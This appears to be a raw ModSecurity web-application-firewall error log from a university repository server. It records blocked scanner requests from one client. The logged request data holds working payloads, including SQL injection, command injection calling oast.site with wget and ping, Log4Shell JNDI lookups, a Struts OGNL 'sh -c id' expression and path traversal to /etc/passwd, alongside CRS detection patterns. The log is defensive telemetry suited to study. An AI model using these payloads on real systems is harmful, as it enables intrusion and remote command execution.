[Tue Aug 29 11:33:55.474499 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:item_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:item_id: 0 union select sleep(5) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11M8Co-f0AAASEJSAAAAAE"]
[Tue Aug 29 11:33:56.895080 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:plot. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:plot: ;wget http:/cjmn8l5jmimk2adbbnlgtykzc5xm98e8s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NMCo-f0AAASGMrYAAAAA"]
[Tue Aug 29 11:33:57.575403 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirectAction:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.set [hostname "repositoryfeb.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11NcCo-f0AAARy-3cAAAAb"]
[Tue Aug 29 11:33:58.131406 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id_products[]: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(6)))xoOt)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11NsCo-f0AAASK4cAAAAAI"]
[Tue Aug 29 11:33:59.139204 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');  found within ARGS:options: [\\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO extra_field_options(option_value) VALUES ('2UdxkpHWJwFq0iCfNXfFeNNF0Wt'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '2UdxkpHWJwFq0iCfNXfFeNNF0Wt', 16,0) ON DUPLICATE KEY UPDATE     tag='2UdxkpHWJwFq0iCfNXfFeNNF0Wt', field_id=16, count=0;  -- \\x..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASOUoUAAAAR"]
[Tue Aug 29 11:33:59.334724 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:options. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- \\x22] found within ARGS:options: [\\x22test') or 1=1 -- \\x22]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/main/inc/ajax/extra_field.ajax.php"] [unique_id "ZO11N8Co-f0AAASLqA8AAAAM"]
[Tue Aug 29 11:34:00.616323 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:CityId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')), found within ARGS:CityId: 33'union select sys.fn_sqlvarbasetostr(HashBytes('MD5','2UdxjgrcjQwqw1tZm6TSev79zjh')),2--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/City_ajax.aspx"] [unique_id "ZO11OMCo-f0AAARtAEAAAAAV"]
[Tue Aug 29 11:34:01.516999 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:S1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:S1: (SELECT md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/yyoa/common/js/menu/test.jsp"] [unique_id "ZO11OcCo-f0AAASIz-8AAAAG"]
[Tue Aug 29 11:34:03.403480 2023] [:error] [pid 1172] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-419}${:-626}.${hostName}.postdata.cjmn8l5jmimk2adbbnlg55e4x3qdx963t.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/j_security_check"] [unique_id "ZO11O8Co-f0AAASUXzwAAAAd"]
[Tue Aug 29 11:34:04.407755 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: { found within ARGS:login: $(ping${IFS}-nc${IFS}2${IFS}`whoami`.cjmn8l5jmimk2adbbnlgeyqxw1m4m16zz.oast.site)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/index.php"] [unique_id "ZO11PMCo-f0AAARtAEQAAAAV"]
[Tue Aug 29 11:34:06.395129 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22},{\\x22 found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22kevinlab\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22kevin003\\x22},{\\x22name\\x22:\\x22device_key\\x22,\\x22value\\x22:\\x22a2fe6b53-e09d-46df-8c9a-e666430e163e\\x22},{\\x22name\\x22:\\x22auto_login\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO11PsCo-f0AAAPLwFUAAAAX"]
[Tue Aug 29 11:34:07.304732 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/user/register"] [unique_id "ZO11P8Co-f0AAASNzowAAAAQ"]
[Tue Aug 29 11:34:07.329716 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:month. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:month: 1 AND (SELECT 6881 FROM (SELECT(SLEEP(6)))iEAn)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11P8Co-f0AAASHh5wAAAAD"]
[Tue Aug 29 11:34:08.347698 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QMCo-f0AAASQp-8AAAAT"]
[Tue Aug 29 11:34:08.363892 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:term. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:term: aaa' union select 1,sleep(6),3-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QMCo-f0AAASPDKEAAAAS"]
[Tue Aug 29 11:34:09.324652 2023] [:error] [pid 1168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:country_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:country_id: 1 AND (SELECT 42 FROM (SELECT(SLEEP(6)))b)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11QcCo-f0AAASQqAIAAAAT"]
[Tue Aug 29 11:34:09.341740 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '-- - found within ARGS:username: admin' or '1'='1'-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11QcCo-f0AAASK4egAAAAI"]
[Tue Aug 29 11:34:10.345078 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAASNzpUAAAAQ"]
[Tue Aug 29 11:34:10.363885 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlgpptwinhb5wkz3.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAASLqDEAAAAM"]
[Tue Aug 29 11:34:10.383190 2023] [:error] [pid 1183] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAASfNusAAAAg"]
[Tue Aug 29 11:34:11.302974 2023] [:error] [pid 1165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASNzpkAAAAQ"]
[Tue Aug 29 11:34:11.426386 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgaaujenxf5khie.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlgaaujenxf5khie.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlgq4hyamrdeyhts.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASK4e8AAAAI"]
[Tue Aug 29 11:34:12.400760 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAARQ4G8AAAAB"]
[Tue Aug 29 11:34:13.313536 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASK4fEAAAAI"]
[Tue Aug 29 11:34:15.346881 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgpqttdz1jhebwn.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgpqttdz1jhebwn.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAASHh7gAAAAD"]
[Tue Aug 29 11:34:15.369462 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAAQKOuEAAAAs"]
[Tue Aug 29 11:34:16.323377 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "repositoryfeb.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASI0B0AAAAG"]
[Tue Aug 29 11:34:16.323444 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASI0B0AAAAG"]
[Tue Aug 29 11:34:16.344140 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAShCWkAAAAi"]
[Tue Aug 29 11:34:16.373008 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASGMuQAAAAA"]
